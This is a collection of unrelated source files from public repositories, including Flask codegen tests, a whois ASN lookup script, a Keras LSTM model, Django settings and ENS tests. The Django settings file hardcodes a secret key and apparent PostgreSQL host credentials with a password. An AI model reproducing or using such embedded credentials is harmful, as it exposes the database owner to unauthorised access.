4090f3954d79fa95b3147542ae914954ce50ced1 | c066e22a14eb4bfaceeced7d1d9ced751b881862 | /tests/test_flask.py | fa1c00d487473b6897c28232c3b96aadc801353e | [] | no_license | mkobar/flaskleap | 10eed89fdf02e466f654bbcf268ae5eaa9e0c50f | a185e74bd6a1798481be99825eb2e9767a28d783 | refs/heads/master | 2023-03-20T18:45:28.438145 | 2017-08-09T05:50:22 | 2017-08-09T05:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,310 | py | from __future__ import absolute_import
from codegen.parser import Swagger
from codegen.flask import (
_swagger_to_flask_url,
_path_to_endpoint,
_path_to_resource_name,
FlaskGenerator
)
def test_swagger_to_flask_url():
cases = [
{
'url': '/users/{id}',
'data': {
'parameters': [{
'name': 'id',
'in': 'path',
'type': 'integer'
}],
'get': {
'parameters': [{
'name': 'limit',
'in': 'query',
'type': 'integer'
}]
},
'post': {
'parameters': [{
'name': 'user',
'in': 'body',
'schema': {
'properties': {
'name': {'type': 'string'}
}
}
}]
}
},
'expect': (
'/users/<int:id>',
['id']
)
},
{
'url': '/goods/categories/{category}/price-large-than/{price}/order-by/{order}',
'data': {
'get': {
'parameters': [{
'name': 'limit',
'in': 'query',
'type': 'integer'
}, {
'name': 'order',
'in': 'path',
'type': 'string'
}, {
'name': 'price',
'in': 'path',
'type': 'float'
}]
},
'parameters': [{
'name': 'category',
'in': 'path',
'type': 'integer'
}]
},
'expect': (
'/goods/categories/<int:category>/price-large-than/<float:price>/order-by/<order>',
['category', 'price', 'order']
)
},
{
'url': '/products/{product_id}',
'data': {},
'expect': (
'/products/<product_id>',
['product_id']
)
}
]
for case in cases:
assert _swagger_to_flask_url(case['url'], case['data']) == case['expect']
def test_path_to_endpoint():
cases = [{
'path': '/users/{id}',
'expect': 'users_id'
}, {
'path': '/users/{id}/profile',
'expect': 'users_id_profile'
}, {
'path': '/users/{id}/hat-size',
'expect': 'users_id_hat_size'
}]
for case in cases:
assert _path_to_endpoint(case['path']) == case['expect']
def test_path_to_resource_name():
cases = [{
'path': '/users/{id}',
'expect': 'UsersId'
}, {
'path': '/users/{id}/profile',
'expect': 'UsersIdProfile'
}, {
'path': '/posts/{post_id}/last-reply',
'expect': 'PostsPostIdLastReply'
}]
for case in cases:
assert _path_to_resource_name(case['path']) == case['expect']
def test_process_data():
data = {
'paths': {
'/users': {
'get': {},
'put': {},
'head': {},
'parameters': []
},
'/posts/{post_id}': {
'get': {
'parameters': [
{'name': 'post_id', 'in': 'path', 'type': 'integer'},
{'name': 'page', 'in': 'query', 'type': 'integer'}
]
}
}
}
}
swagger = Swagger(data)
generator = FlaskGenerator(swagger)
schemas, routes, view1, view2 = list(generator.generate())[:4]
view1, view2 = sorted([view1, view2], key=lambda x: x.data['name'])
assert ('posts_post_id', 'GET') in schemas.data['validators']
assert schemas.data['validators'][('posts_post_id', 'GET')]['args']['properties']['page']['type'] == 'integer'
assert view1.data['url'] == '/posts/<int:post_id>'
assert view1.data['name'] == 'PostsPostId'
| [
"[email protected]"
] | |
da518403dfa304abfd8ff3784a3ce7d274b22794 | 8e9150fd18c5f6a1aee81d27f383fcab04945221 | /ENCODN/FRAMES/RADIOACTIVITY.py | e5e6401d50f2898c60ce86062702be9890b44fe7 | [
"MIT"
] | permissive | akshitadixit/ENCODN | 04e3297722e77bba92d1dcb4d9947663514ce110 | 7b4ecaba10314f9f59f53e9b479016b21f8b632b | refs/heads/main | 2023-03-07T02:30:46.313429 | 2021-01-22T07:13:30 | 2021-01-22T07:13:30 | 340,953,231 | 0 | 1 | MIT | 2021-02-21T16:54:37 | 2021-02-21T16:54:36 | null | UTF-8 | Python | false | false | 713 | py | from tkinter import *
from tkinter import ttk
t_names = ["RADIOACTIVITY"]
frames = []
fr_names = []
def RADIOACTIVITY(master=None):
s = ttk.Style(master)
s.configure('lefttab.TNotebook',padding=[20,20], tabposition='wn')
nb = ttk.Notebook(master, s='lefttab.TNotebook', width=800, height=570)
nb.grid(row=0, column=0, sticky="e", padx=20, pady=15)
nb.grid_propagate(0)
for i in range(len(t_names)):
frames.append(Frame(nb,bg="#7ad159", width = 750, height=500))
nb.add(frames[i], text=t_names[i])
#calling frame setups here
for i in range(len(fr_names)):
fr_names[i](frames[i])
| [
"[email protected]"
] | |
9732fd344954ff4e88a31303d0349104261cfd94 | 3f8999a077b4e9ca50241eddc5cd0f86284f4466 | /asn-to-ipv4.py | 26cb91f520e9925d4252bc316f59b58719d5b282 | [] | no_license | kendokan/pfSense-enhancements | 1a8abfa8e7f34341e51e3b3fed66c721d5230a77 | d4627818c436d766c3879dce58401300276e0341 | refs/heads/master | 2021-09-05T14:14:35.986805 | 2018-01-28T17:44:01 | 2018-01-28T17:44:01 | 112,949,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | #!/usr/bin/env python2
import socket
import re
## https://tools.ietf.org/html/rfc3912
def whois_request(domain, server, port=43):
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.connect((server, port))
_sock.send("%s\r\n" % domain)
_result = ""
while True:
_data = _sock.recv(1024)
if not _data:
break
_result += _data
return _result
def get_AS(AS,IPV4=True,IPV6=True):
## sanitize ASN
_asn = re.search("(?:AS)?(\d{1,10})",AS,re.IGNORECASE)
if not _asn:
return ""
_asn = "AS{0}".format(_asn.group(1))
is6 = ""
if IPV6:
is6 = "[6]?" if IPV4 else "6"
_raw = whois_request("-i origin {0}".format(_asn),"whois.radb.net")
if _raw:
_ips= re.findall("^route{0}:\s+(.*?)$".format(is6),_raw,re.MULTILINE)
return "\n".join(_ips)
return ""
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
for i in range(1,len(sys.argv)):
AS=sys.argv[i]
print get_AS(AS,IPV6=False)
else:
print "Usage:",sys.argv[0],"as32934"
| [
"[email protected]"
] | |
8bc6d88dd78f78b098e64d97469a50334292230d | 4037275bc34cada84ab026cba27f175d60441816 | /Search/src/problem_417.py | 052dd2ab14b2c82be145449df0f3f6327a546f7b | [
"Apache-2.0"
] | permissive | LihaoWang1991/LeetCode | fe524f0705eb740b0f252cdad33c722c1fbfc9c7 | 391b3beeefe1d32c8a4935a66175ab94445a1160 | refs/heads/master | 2022-11-08T02:25:28.824880 | 2020-06-14T21:18:53 | 2020-06-14T21:18:53 | 271,296,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | # problem link: https://leetcode.com/problems/pacific-atlantic-water-flow/
class Solution:
def pacificAtlantic(self, matrix: List[List[int]]) -> List[List[int]]:
ans = []
dirs = [[-1,0], [0,-1], [1,0],[0,1]]
num_r = len(matrix)
num_c = len(matrix[0]) if num_r > 0 else 0
can_reach_p = [[False for _ in range(num_c)] for _ in range(num_r)] # mark if one point can reach pacific ocean
can_reach_a = [[False for _ in range(num_c)] for _ in range(num_r)] # mark if one point can reach atlantic ocean
def dfs(r, c, p_or_a):
can_reach = can_reach_p if p_or_a == "p" else can_reach_a
if can_reach[r][c] == True:
return
can_reach[r][c] = True
for [i,j] in dirs:
next_r = r + i
next_c = c + j
if 0<=next_r<num_r and 0<=next_c<num_c and matrix[r][c]<=matrix[next_r][next_c]:
dfs(next_r, next_c, p_or_a)
for r in range(num_r):
dfs(r, 0, "p")
dfs(r, num_c - 1, "a")
for c in range(num_c):
dfs(0, c, "p")
dfs(num_r - 1, c, "a")
for r in range(num_r):
for c in range(num_c):
if can_reach_p[r][c] and can_reach_a[r][c]:
ans.append([r,c])
        return ans
| [
"[email protected]"
] | |
f90bba74f734eb145a741d2c8e820622f35afabf | ebbfc604cb11337996517c00fc877426b5c2474f | /py/testread.py | be4643ba572e82fae8b83561dc937a79e421aae6 | [] | no_license | SeeTheEveryCornerOfTheWorld/Github_C | d1a689765f81d6d3589bb5f9a4aef79bf841c39e | 3b3713adf45442a1174e4c7cee77c38bacf69ab1 | refs/heads/master | 2022-03-08T20:50:28.570023 | 2022-02-21T05:49:07 | 2022-02-21T05:49:07 | 217,028,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | #!/usr/bin/env python
import os
import subprocess
#rf =open("/mnt/sharefile-sync/00005_40_172.168.0.175_SMB2/File6.txt",mode='r')
rf = open("/root/readspeed.txt",mode = 'r')
command = "date"
command_ret = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
size =0
while(1):
data=rf.read(10240)
size += len(data)
print("size = %d"%(size))
if(len(data) == 0):
break
print("reading")
rf.close()
print(command_ret)
os.system("date")
| [
"[email protected]"
] | |
25ec7d108b0205b53350fb5e8dad55b960ec5a57 | 462178257804e3be5603b7cf4d2f7ca872730e04 | /rescue_me/urls.py | da494ee2861cd71511da3af03ca401e42511664d | [] | no_license | davincikab/dqrf | ac62a243dd2fb812efbac19e3b2af872032a9214 | b051748b864d75b5fc58f289a4c2a1f17ab4aa81 | refs/heads/master | 2023-03-08T12:35:37.089047 | 2021-02-13T08:19:25 | 2021-02-13T08:19:25 | 318,788,271 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('chat/', include('chat.urls')),
path('', include('alerts.urls')),
path('accounts/', include('accounts.urls')),
path('api/v1/', include('api.urls')),
path('api-auth/', include('rest_framework.urls')),
path('api/v1/rest-auth/', include('rest_auth.urls')),
path('api/v1/rest-auth/registration/', include('rest_auth.registration.urls')),
]
| [
"[email protected]"
] | |
42990fc2ef621390f648cebe4f0d3b18aee7ffdb | a6b5156e5445d3eef4c772da47dadf3a0b1d2457 | /api/settings.py | e54d76a0f2189de200dc7681c2ae0df8a12c3696 | [] | no_license | dev-frog/Django_api_ | fff4cecc5b6f26fc6ea23ab6536105ae21580be7 | 1a4b5beda504aef3494709f474ed40340aa9006c | refs/heads/master | 2020-07-22T08:49:46.106808 | 2019-10-14T16:04:47 | 2019-10-14T16:04:47 | 207,138,412 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,347 | py | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.1.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import psycopg2
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tkjk0)!4!ntoj1&iu*urmu&wm5wf)moihjn2cwlz^di^esd+e6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST' : 'salt.db.elephantsql.com',
'NAME' : 'sdmikhhi',
'USER' : 'sdmikhhi',
'PASSWORD' : 'WPyBHXZwrbvBTAYAmcYYnFPWlIXU7TSV',
'PORT' :'5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| [
"[email protected]"
] | |
f3aaf829e4a6a9dcfe32371652f033a8319a6c55 | 31063e125fdd4f3987ba4580eb2089a99e5f2fcc | /Components/Widgets/StylizedButton.py | f910e7570605171679ceaf9bd8d8fddcba82813b | [
"MIT"
] | permissive | shell-done/Spongo | 70b2397867837f6bcfac531948cd519d91d119ff | 3492c889b1d60cf50b4b2625b496fd6958309a8e | refs/heads/main | 2023-04-16T07:19:26.483522 | 2021-04-30T23:51:32 | 2021-04-30T23:51:32 | 346,677,492 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | from PySide2.QtCore import Qt
from PySide2.QtGui import QColor
from PySide2.QtWidgets import QGraphicsDropShadowEffect, QPushButton
class StylizedButton(QPushButton):
def __init__(self, text: str, object_name: str = "blue"):
super().__init__(text)
self.setCursor(Qt.PointingHandCursor)
if object_name:
self.setObjectName(object_name)
effect = QGraphicsDropShadowEffect(self)
        effect.setColor(QColor(0, 0, 0, int(0.25 * 255)))  # 25% black shadow
effect.setOffset(2, 4)
effect.setBlurRadius(4)
self.setGraphicsEffect(effect)
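# Editor's sketch (addition, not in the original): typical usage inside an
# existing QApplication; "blue" is assumed to match an objectName-based rule
# in the application's stylesheet.
#   button = StylizedButton("Start", object_name="blue")
#   some_layout.addWidget(button)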
| [
"[email protected]"
] | |
2cc24c8667384b5e9a629eab52a21b76df49b0ce | 38766965a5c6b1e7747ead9495becb1ef3cf5f0f | /Colab_Functions/access_drive.py | 33008795ee8cf63b89e405a370cef30ba348e552 | [] | no_license | mpcrlab/DeepLearningFall2018 | 596c5216e7cfd7263dd59f69badb3a3fd5a0429c | ca2343749fe76f5752f39ca3becd1be9c212c306 | refs/heads/master | 2020-03-26T22:38:29.826402 | 2018-12-12T05:19:54 | 2018-12-12T05:19:54 | 145,475,999 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | #Load drive helper and mount
from google.colab import drive
#authorization prompt
drive.mount('/content/drive')
| [
"[email protected]"
] | |
cf514d8bc867ed8c8a0425190fd1809d38f1caaa | 3a59a9e0fe6014b04dd3ab7e352803f8ec112818 | /src/UniTopicModel.py | 26b5d998ac82264ff4e20bf5f879423f43004603 | [] | no_license | owengbs/TopicModel | 05adfe598980c6028431835dd88d028c6390b591 | d9aae7fe95a78c13b177823f349a9dae39e20d97 | refs/heads/master | 2021-01-10T20:30:16.924284 | 2015-07-06T06:09:51 | 2015-07-06T06:09:51 | 38,486,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | #-*- coding:utf-8 -*-
import math, numpy
import CommonWords
"""
@author: macxin
@contact: [email protected]
@license: GPL
@summary:
ๅไธป้ขๆจกๅ็ฎๆณ๏ผๅ่https://d396qusza40orc.cloudfront.net/textanalytics/lecture_notes/wk2/TM-16-one-topic.pdf
UniTopic็ฎๆณ่่ไธคไธชไธป้ขๅๅธ๏ผ็ฎๆ ไธป้ขๅ่ๆฏไธป้ข
่ๆฏไธป้ข๏ผไธป้ข่ฏๆฅ่ชๅจ็บฟ่ฏญๆๅบ็็ฐไปฃๆฑ่ฏญ่ฏๅ
ธ่ฏ้ข็ป่ฎก๏ผhttp://www.cncorpus.org/Resources.aspx
็ฎๆ ไธป้ข๏ผๅพ
ๅๆ็ไธป้ขๆจกๅ
้ๆบ็ๆๆจกๅ๏ผ่งๅฏๆ ทๆฌ็ๆฏไธช่ฏๆฏ็ป่ฟๅฏนไธคไธชไธป้ข่ฟ่กๆฝๆ ทๅไปๆฏไธชไธป้ขไธญๆฝๆ ท็ฎๆ ่ฏๅฝขๆใๅไธช่ฏๆฅ่ชๅชไธชไธป้ข่งไธบ้ๅ้Z
ๆฑ่งฃ็ฎๆณ๏ผEM๏ผExpectation-Maximization๏ผ
EStep๏ผๅบๅฎไธป้ข่ฏๅๅธ๏ผๆดๆฐZ็้ขๆตๅผ
MStep๏ผๅบๅฎZ๏ผๆไผๅไธป้ข่ฏๅๅธ
ๅฏ่ฐๆด็้ขๅๅๆฐ๏ผ
p_theta_d๏ผ็ฎๆ ไธป้ข็ๆฆ็
p_theta_b๏ผ่ๆฏไธป้ข็ๆฆ็๏ผp_theta_d + p_theta_b = 1๏ผ
่พๅบ๏ผๆๅฐ็ฎๆ ไธป้ข็topไธชไธป้ข่ฏ
'"""
class UniTopicModel():
def __init__(self):
self.word_freq = []
self.word_idx = {}
self.idx_word = {}
self.total_count = 0
self.p_theta_d = 0.5#destination topic
self.p_theta_b = 0.5#background topic
self.epsilon = 1e-30
def _cal_p_z0_g_w(self, wi):
nominator = self.p_theta_d * self.p_w_g_theta_d[wi]
denominator = self.p_theta_d * self.p_w_g_theta_d[wi] + self.p_theta_b * self.p_w_g_theta_b[wi]
if denominator == 0:
denominator = self.epsilon
return nominator / denominator
def _cal_p_w_g_theta_d(self, wi):
nominator = self.word_freq[wi] * self.p_z0_g_w[wi]
denominator = 0
for wj in range(self.feature_size):
denominator += self.word_freq[wj] * self.p_z0_g_w[wj]
if denominator == 0:
denominator = self.epsilon
return nominator / denominator
def likely_hood(self):
result = 0
for i in range(self.feature_size):
logval = self.p_theta_d*self.p_w_g_theta_d[i] + self.p_theta_b*self.p_w_g_theta_b[i]
result += self.word_freq[i] * math.log( logval )
return result
def estep(self):
for i in range(self.feature_size):
self.p_z0_g_w[i] = self._cal_p_z0_g_w(i)
def mstep(self):
for i in range(self.feature_size):
self.p_w_g_theta_d[i] = self._cal_p_w_g_theta_d(i)
def initialize(self):
self.feature_size = len(self.word_idx)
self.p_w_g_theta_d = numpy.zeros(self.feature_size, float)
self.p_w_g_theta_b = numpy.zeros(self.feature_size, float)
self.p_z0_g_w = numpy.zeros(self.feature_size, float)
for i in range(self.feature_size):
word = self.idx_word[i]
self.p_w_g_theta_d[i] = 1.0/self.feature_size
self.p_w_g_theta_b[i] = 1.0/self.feature_size
self.p_w_g_theta_b[i] = CommonWords.commonfreq.freqdict[word] if CommonWords.commonfreq.freqdict.has_key(word) else 1.0/self.feature_size
def dump_topic_word(self):
items = [(i, self.p_w_g_theta_d[i]) for i in range(self.feature_size)]
items_sorted = sorted(items, cmp = lambda x,y:cmp(x[1], y[1]), reverse = True)
for i in range(min(20, len(items_sorted))):
print self.idx_word[items_sorted[i][0]]+" ",
print '\n'
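## Editor's sketch (addition, not in the original): a typical EM driver loop.
## The toy word statistics below are assumptions; the original module leaves
## corpus loading to the caller.
if __name__ == '__main__':
    model = UniTopicModel()
    for i, (w, f) in enumerate([('data', 10.0), ('mining', 7.0), ('the', 30.0)]):
        model.word_idx[w] = i
        model.idx_word[i] = w
        model.word_freq.append(f)
    model.word_freq = numpy.array(model.word_freq)
    model.initialize()
    for it in range(20):
        model.estep()
        model.mstep()
        print 'iteration %d, log-likelihood %.6f' % (it, model.likely_hood())
    model.dump_topic_word()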
| [
"[email protected]"
] | |
737e686106e62f1541294acb60cd72b3fa44be73 | 2b7a3e8797a5c5bedd9efeae6c6378eac92f6534 | /tests/tests_my_primitive_cover.sage.py | 50f89886f94007d650a3f68d5378857a51bb5ca2 | [] | no_license | madamelo/ParkingFunctions | 5be8b81c63082acafc3ec94a6a9939061c6e7e0b | aa79acea33d7e9b6cf73ec84fccf3724566bba59 | refs/heads/master | 2022-12-19T12:31:01.448137 | 2020-09-06T16:56:10 | 2020-09-06T16:56:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py |
# This file was *autogenerated* from the file ../tests/tests_my_primitive_cover.sage
from sage.all_cmdline import * # import sage library
_sage_const_1 = Integer(1); _sage_const_3 = Integer(3); _sage_const_4 = Integer(4); _sage_const_5 = Integer(5); _sage_const_7 = Integer(7); _sage_const_6 = Integer(6); _sage_const_2 = Integer(2)
sage.repl.load.load(sage.repl.load.base64.b64decode("Li4vY29kZS9teV9wcmltaXRpdmVfY292ZXIuc2FnZQ=="),globals(),False)
# TESTS MPC
print ("Tests MPC")
L1 = [_sage_const_1 , _sage_const_1 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_5 , _sage_const_7 ]
L2 = [_sage_const_1 , _sage_const_1 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_6 , _sage_const_7 ]
L3 = [_sage_const_1 , _sage_const_2 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_6 , _sage_const_7 ]
L4 = [_sage_const_1 , _sage_const_2 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_4 , _sage_const_7 ]
print (my_prim_cov (L1, L2))
print (my_prim_cov (L2, L1))
print (my_prim_cov (L3, L1))
print (my_prim_cov (L3, L2))
print (my_prim_cov (L4, L1))
print ()
D1 = fpp_to_dyck (L1)
D2 = fpp_to_dyck (L2)
D3 = fpp_to_dyck (L3)
D4 = fpp_to_dyck (L4)
print (my_prim_cov_dyck (D1, D2))
print (my_prim_cov_dyck (D2, D1))
print (my_prim_cov_dyck (D3, D1))
print (my_prim_cov_dyck (D3, D2))
print (my_prim_cov_dyck (D4, D1))
print ()
L = list (generate_fpp (_sage_const_7 ))
P1 = Poset ([L, my_prim_cov])
print (len (P1.cover_relations ()))
print (P1.relations_number ())
print ()
L2 = []
for f in L :
L2.append (DyckWord (fpp_to_dyck (f)))
P2 = Poset ([L2, my_prim_cov_dyck])
print (len (P2.cover_relations ()))
print (P2.relations_number ())
print ()
print (num_rel (_sage_const_7 ))
| [
"[email protected]"
] | |
974f1cd94b2f2eb114c6c64c01378ca3c1e007ce | 10d98fecb882d4c84595364f715f4e8b8309a66f | /kws_streaming/models/lstm.py | d459369e48cccd4f93ece10dc9de15a260f6b60a | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,941 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LSTM with Mel spectrum and fully connected layers."""
from kws_streaming.layers import lstm
from kws_streaming.layers import modes
from kws_streaming.layers import speech_features
from kws_streaming.layers import stream
from kws_streaming.layers.compat import tf
import kws_streaming.models.model_utils as utils
def model_parameters(parser_nn):
"""LSTM model parameters."""
parser_nn.add_argument(
'--lstm_units',
type=str,
default='500',
help='Output space dimensionality of lstm layer ',
)
parser_nn.add_argument(
'--return_sequences',
type=str,
default='0',
help='Whether to return the last output in the output sequence,'
'or the full sequence',
)
parser_nn.add_argument(
'--stateful',
type=int,
default='1',
help='If True, the last state for each sample at index i'
'in a batch will be used as initial state for the sample '
'of index i in the following batch',
)
parser_nn.add_argument(
'--num_proj',
type=str,
default='200',
help='The output dimensionality for the projection matrices.',
)
parser_nn.add_argument(
'--use_peepholes',
type=int,
default='1',
help='True to enable diagonal/peephole connections',
)
parser_nn.add_argument(
'--dropout1',
type=float,
default=0.3,
help='Percentage of data dropped',
)
parser_nn.add_argument(
'--units1',
type=str,
default='',
help='Number of units in the last set of hidden layers',
)
parser_nn.add_argument(
'--act1',
type=str,
default='',
help='Activation function of the last set of hidden layers',
)
def model(flags):
"""LSTM model.
Similar model in papers:
Convolutional Recurrent Neural Networks for Small-Footprint Keyword Spotting
https://arxiv.org/pdf/1703.05390.pdf (with no conv layer)
Model topology is similar with "Hello Edge: Keyword Spotting on
Microcontrollers" https://arxiv.org/pdf/1711.07128.pdf
Args:
flags: data/model parameters
Returns:
Keras model for training
"""
input_audio = tf.keras.layers.Input(
shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),
batch_size=flags.batch_size)
net = input_audio
if flags.preprocess == 'raw':
# it is a self contained model, user need to feed raw audio only
net = speech_features.SpeechFeatures(
speech_features.SpeechFeatures.get_params(flags))(
net)
for units, return_sequences, num_proj in zip(
utils.parse(flags.lstm_units), utils.parse(flags.return_sequences),
utils.parse(flags.num_proj)):
net = lstm.LSTM(
units=units,
return_sequences=return_sequences,
stateful=flags.stateful,
use_peepholes=flags.use_peepholes,
num_proj=num_proj)(
net)
net = stream.Stream(cell=tf.keras.layers.Flatten())(net)
net = tf.keras.layers.Dropout(rate=flags.dropout1)(net)
for units, activation in zip(
utils.parse(flags.units1), utils.parse(flags.act1)):
net = tf.keras.layers.Dense(units=units, activation=activation)(net)
net = tf.keras.layers.Dense(units=flags.label_count)(net)
if flags.return_softmax:
net = tf.keras.layers.Activation('softmax')(net)
return tf.keras.Model(input_audio, net)
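# Editor's note (addition): the lstm.LSTM and stream.Stream wrappers above are
# used instead of plain tf.keras layers so that the trained graph stays
# convertible to the streaming-inference Modes handled elsewhere in
# kws_streaming.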
| [
"[email protected]"
] | |
5d729490511e978dc60397debea6f54853c658cc | ae50e3c7577169550d2e27a8c22301114e32e7a3 | /tests/test_setup_name.py | dd8b3e3f97fed71f8fb402b536332791930764b5 | [
"MIT"
] | permissive | carver/ens.py | 7535607588ddbff97e592881cf710137a395e229 | 5f2f70281e19fdd16879427553fa07d451fbc152 | refs/heads/master | 2022-03-09T04:10:38.061362 | 2018-09-17T18:16:10 | 2018-09-17T18:16:10 | 98,133,934 | 41 | 10 | null | 2017-10-03T17:36:34 | 2017-07-24T00:27:34 | Python | UTF-8 | Python | false | false | 3,383 | py |
import pytest
from unittest.mock import Mock
from ens.main import UnauthorizedError, AddressMismatch, UnownedName
'''
API at: https://github.com/carver/ens.py/issues/2
'''
@pytest.fixture
def ens2(ens, mocker, addr1, addr9, hash9):
mocker.patch.object(ens, '_setup_reverse')
mocker.patch.object(ens, 'address', return_value=None)
mocker.patch.object(ens, 'owner', return_value=None)
mocker.patch.object(ens.web3, 'eth', wraps=ens.web3.eth, accounts=[addr1, addr9])
mocker.patch.object(ens, 'setup_address')
'''
mocker.patch.object(ens, '_resolverContract', return_value=Mock())
mocker.patch.object(ens, '_first_owner', wraps=ens._first_owner)
mocker.patch.object(ens, '_claim_ownership', wraps=ens._claim_ownership)
mocker.patch.object(ens, '_set_resolver', wraps=ens._set_resolver)
mocker.patch.object(ens.ens, 'resolver', return_value=None)
mocker.patch.object(ens.ens, 'setAddr', return_value=hash9)
mocker.patch.object(ens.ens, 'setResolver')
mocker.patch.object(ens.ens, 'setSubnodeOwner')
'''
return ens
def test_cannot_set_name_on_mismatch_address(ens2, mocker, name1, addr1, addr2):
mocker.patch.object(ens2, 'address', return_value=addr2)
with pytest.raises(AddressMismatch):
ens2.setup_name(name1, addr1)
def test_setup_name_default_address(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'address', return_value=addr1)
ens2.setup_name(name1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_default_to_owner(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'owner', return_value=addr1)
ens2.setup_name(name1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_unowned_exception(ens2, name1):
with pytest.raises(UnownedName):
ens2.setup_name(name1)
def test_setup_name_unauthorized(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'address', return_value=addr1)
mocker.patch.object(ens2.web3, 'eth', wraps=ens2.web3.eth, accounts=[])
with pytest.raises(UnauthorizedError):
ens2.setup_name(name1, addr1)
def test_setup_name_no_resolution(ens2, name1, addr1):
ens2.setup_name(name1, addr1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_transact_passthrough(ens2, name1, addr1):
transact = {'gasPrice': 1}
ens2.setup_name(name1, addr1, transact=transact)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact=transact)
def test_setup_name_resolver_setup(ens2, name1, addr1):
# if the name doesn't currently resolve to anything, set it up
transact = {'gasPrice': 1}
ens2.setup_name(name1, addr1, transact=transact)
ens2.setup_address.assert_called_once_with(name1, addr1, transact=transact)
def test_setup_reverse_label_to_fullname(ens, mocker, addr1):
registrar = mocker.patch.object(ens, '_reverse_registrar', return_value=Mock())
ens._setup_reverse('castleanthrax', addr1)
registrar().setName.assert_called_once_with('castleanthrax.eth', transact={'from': addr1})
def test_setup_reverse_dict_unmodified(ens, mocker, addr1):
mocker.patch.object(ens, '_reverse_registrar', return_value=Mock())
transact = {}
ens._setup_reverse('castleanthrax', addr1, transact=transact)
assert transact == {}
| [
"[email protected]"
] | |
